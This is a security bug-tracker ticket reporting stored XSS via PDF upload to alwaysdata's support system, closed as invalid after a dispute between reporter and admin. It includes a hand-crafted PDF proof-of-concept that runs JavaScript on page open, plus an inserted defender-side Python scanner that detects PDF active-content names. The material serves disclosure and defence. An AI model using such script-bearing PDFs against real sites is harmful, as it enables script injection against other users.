Security vulnerabilities

  • Status Closed
  • Assigned To
    cbay
  • Private
Attached to Project: Security vulnerabilities
Opened by milapshah1 - 17.07.2024
Last edited by cbay - 17.07.2024

FS#63 - Stored XSS Via Upload Document

Vulnerability Explanation - When a user uploads a document containing malicious code, such as JavaScript, to the web application, it gets stored on the server without proper validation or sanitization. This allows an attacker to inject and execute arbitrary scripts within the application's context.

Impact - This vulnerability enables attackers to execute unauthorized scripts on the client side, leading to session hijacking, data theft, or defacement of the web application. It can compromise user privacy, damage the application's reputation, and potentially expose sensitive information to malicious actors.

Severity - High

Steps to reproduce -
1) Go to support: https://admin.alwaysdata.com/support/
2) Open a new ticket
3) Upload this code as a.pdf:

%PDF-1.3
%����
1 0 obj
<</Pages 2 0 R /Type /Catalog>>
endobj
2 0 obj
<</Count 1 /Kids [3 0 R] /Type /Pages>>
endobj
% page object: /AA /O attaches a JavaScript action that runs when the page is opened
3 0 obj
<</AA <</O <</JS (
try {
app.alert\("xss"\)
} catch \(e\) {
app.alert\(e.message\);
}
) /S /JavaScript>>>>
/Annots [] /Contents 4 0 R /MediaBox [0 0 612 792] /Parent 2 0 R
/Resources <</Font <</F1 <</BaseFont /Helvetica /Subtype /Type1 /Type /Font>>>>>>
/Type /Page>>
endobj
4 0 obj
<</Length 21>>
stream
BT
/F1 24 Tf
ET
endstream
endobj
xref
0 5
0000000000 65535 f
0000000015 00000 n
0000000062 00000 n
0000000117 00000 n
0000000424 00000 n
trailer
<</Root 1 0 R /Size 5>>
startxref
493
%%EOF

4) Upload this file
5) Open this ticket
6) Click on the uploaded malicious PDF file; it will reflect

Closed by  cbay
17.07.2024 14:21
Reason for closing:  Invalid
Admin
cbay commented on 17.07.2024 11:52

Hello,

As far as I know, malicious PDF files cannot do harm when viewed in a browser. Please upload a video of your PoC.

Kind regards,
Cyril

How can I upload a PoC video? I did not see any attachment option.

Admin
cbay commented on 17.07.2024 12:01

There's an "Attach a file (max. 256 MiB)" button near the "Add comment" button.

I am able to see only 2 buttons: Add link and Add comment.

I have attached a PoC video via a Google Drive link. Also, to answer your first comment: this can lead to several types of attacks and escalations, including:

Cross-Site Scripting (XSS) Attacks: If the uploaded file contains JavaScript or other executable code, an attacker can craft malicious scripts that get executed in the context of other users' sessions when they access the uploaded content.

Server-Side Code Execution: Depending on how the application processes uploaded files, an attacker might be able to upload a file that contains server-side code (e.g., PHP, Python scripts). This could lead to remote code execution (RCE), where the attacker gains control over the server or the application's backend systems.

File Inclusion Attacks: If the application allows the inclusion of uploaded files in other parts of the application (e.g., including uploaded files as part of dynamically generated content), an attacker could manipulate this to include files containing malicious code, leading to further exploitation.

Data Injection Attacks: Beyond code execution, uploaded files could also be used to inject malicious data into the application's database or other storage systems, potentially compromising data integrity and confidentiality.

Denial of Service (DoS) Attacks: Large or specially crafted files could consume excessive server resources, leading to a denial of service for legitimate users.
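Added example, not part of this ticket and not alwaysdata's code: a defender-side triage check for the kind of upload described in the PoC above. It flags PDF name objects that introduce active content (/JS, /JavaScript, /AA, /OpenAction, /Launch), resolves #xx name escapes and inflates FlateDecode streams so those names cannot be trivially hidden, and returns the response headers that keep a stored upload from rendering inline in the application's own origin. The samples POC_PDF, BENIGN_PDF, HEX_ESCAPED_PDF and COMPRESSED_PDF are constructed here (modelled on the PoC but with the xref table omitted), and the function names scan_pdf and download_headers are this example's own choices, not an API of any real upload handler.

```python
import re
import zlib
from dataclasses import dataclass, field

# Constructed sample modelled on the PoC in this ticket: a page object carrying an /AA
# (additional actions) dictionary whose /O entry is a /JavaScript action.
POC_PDF = b"""%PDF-1.3
1 0 obj
<</Pages 2 0 R /Type /Catalog>>
endobj
2 0 obj
<</Count 1 /Kids [3 0 R] /Type /Pages>>
endobj
3 0 obj
<</AA <</O <</JS (app.alert\\("xss"\\)) /S /JavaScript>>>>
/Type /Page /Parent 2 0 R /MediaBox [0 0 612 792]>>
endobj
trailer
<</Root 1 0 R /Size 4>>
%%EOF
"""

# Constructed sample: the same skeleton with no action dictionaries at all.
BENIGN_PDF = b"""%PDF-1.3
1 0 obj
<</Pages 2 0 R /Type /Catalog>>
endobj
3 0 obj
<</Type /Page /Parent 2 0 R /MediaBox [0 0 612 792]>>
endobj
%%EOF
"""

# Constructed sample: /JS written with a #xx name escape, which a naive substring
# search over the raw bytes would miss.
HEX_ESCAPED_PDF = b"%PDF-1.3\n3 0 obj\n<</Type /Page /J#53 (app.alert(1))>>\nendobj\n%%EOF\n"

# Constructed sample: the action dictionary hidden inside a FlateDecode stream.
COMPRESSED_PDF = (b"%PDF-1.3\n5 0 obj\n<</Filter /FlateDecode /Length 0>>\nstream\n"
                  + zlib.compress(b"<</JS (app.alert(1)) /S /JavaScript>>")
                  + b"\nendstream\nendobj\n%%EOF\n")

# Name objects that introduce active content: /JS and /JavaScript carry scripts,
# /AA and /OpenAction fire actions automatically, /Launch starts an external program.
ACTIVE_NAMES = (b"/JS", b"/JavaScript", b"/AA", b"/OpenAction", b"/Launch")


@dataclass
class ScanResult:
    is_pdf: bool
    findings: list = field(default_factory=list)

    @property
    def has_active_content(self) -> bool:
        return bool(self.findings)


def _expand_hex_escapes(data: bytes) -> bytes:
    """Resolve #xx escapes inside PDF names, so /J#53 is seen as /JS."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), data)


def _inflated_streams(data: bytes) -> bytes:
    """Concatenate the plaintext of every stream that inflates as zlib data."""
    out = []
    for m in re.finditer(rb"stream\r?\n(.*?)endstream", data, re.DOTALL):
        try:
            # decompressobj tolerates the trailing newline before 'endstream'
            out.append(zlib.decompressobj().decompress(m.group(1)))
        except zlib.error:
            continue  # not zlib data (plain content stream, image bytes, ...)
    return b"\n".join(out)


def scan_pdf(data: bytes) -> ScanResult:
    """String-level triage of an uploaded PDF for active-content names.

    This is not a full PDF parser: object streams using other filters or
    encryption are not decoded, so a clean result means 'nothing obvious',
    not proof of safety.
    """
    if not data.startswith(b"%PDF-"):
        return ScanResult(is_pdf=False)
    text = _expand_hex_escapes(data + b"\n" + _inflated_streams(data))
    # Require a non-alphanumeric delimiter so /JS does not match a longer name.
    found = [name.decode() for name in ACTIVE_NAMES
             if re.search(re.escape(name) + rb"(?![A-Za-z0-9])", text)]
    return ScanResult(is_pdf=True, findings=found)


def download_headers(filename: str) -> dict:
    """Headers for serving a stored upload: force a download instead of inline
    rendering in the app's origin, stop MIME sniffing, and deny script execution
    via CSP if a viewer renders the document anyway."""
    safe_name = re.sub(r"[^A-Za-z0-9._-]", "_", filename)
    return {
        "Content-Type": "application/octet-stream",
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


if __name__ == "__main__":
    for label, sample in [("poc", POC_PDF), ("benign", BENIGN_PDF),
                          ("hex", HEX_ESCAPED_PDF), ("compressed", COMPRESSED_PDF)]:
        print(label, scan_pdf(sample).findings)
    print(download_headers("a.pdf"))
```

The scanner is meant as a gate that decides whether an upload is stored at all, or stored but only served with the download_headers policy; it complements, rather than replaces, serving user content from a separate origin as the OWASP File Upload Cheat Sheet linked later in this ticket recommends.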

Admin
cbay commented on 17.07.2024 12:16

Oh sorry, adding attachments is only available for admins.

You can put your file anywhere you want, for instance on your own alwaysdata account.

Thanks for the quick response. I have attached the PoC link in the above drive link.

Admin
cbay commented on 17.07.2024 12:21

Showing a popup is not a vulnerability. As far as I know, you can't steal anything with a malicious PDF.

Hi cbay, stored XSS behaves like this only. Also, for your reference, I am sharing a HackerOne report: https://hackerone.com/reports/683792

Admin
cbay commented on 17.07.2024 13:34

That HackerOne report is totally different: it's a real XSS, nothing to do with PDF.

I am a security researcher. Unfortunately, I prefer not to discuss this issue further. For your reference, I am attaching the OWASP reference related to this matter. It's unfortunate that I've spent time arguing with you and you still haven't understood the points mentioned in the HackerOne report. Thank you for your response. Have a good day. https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html
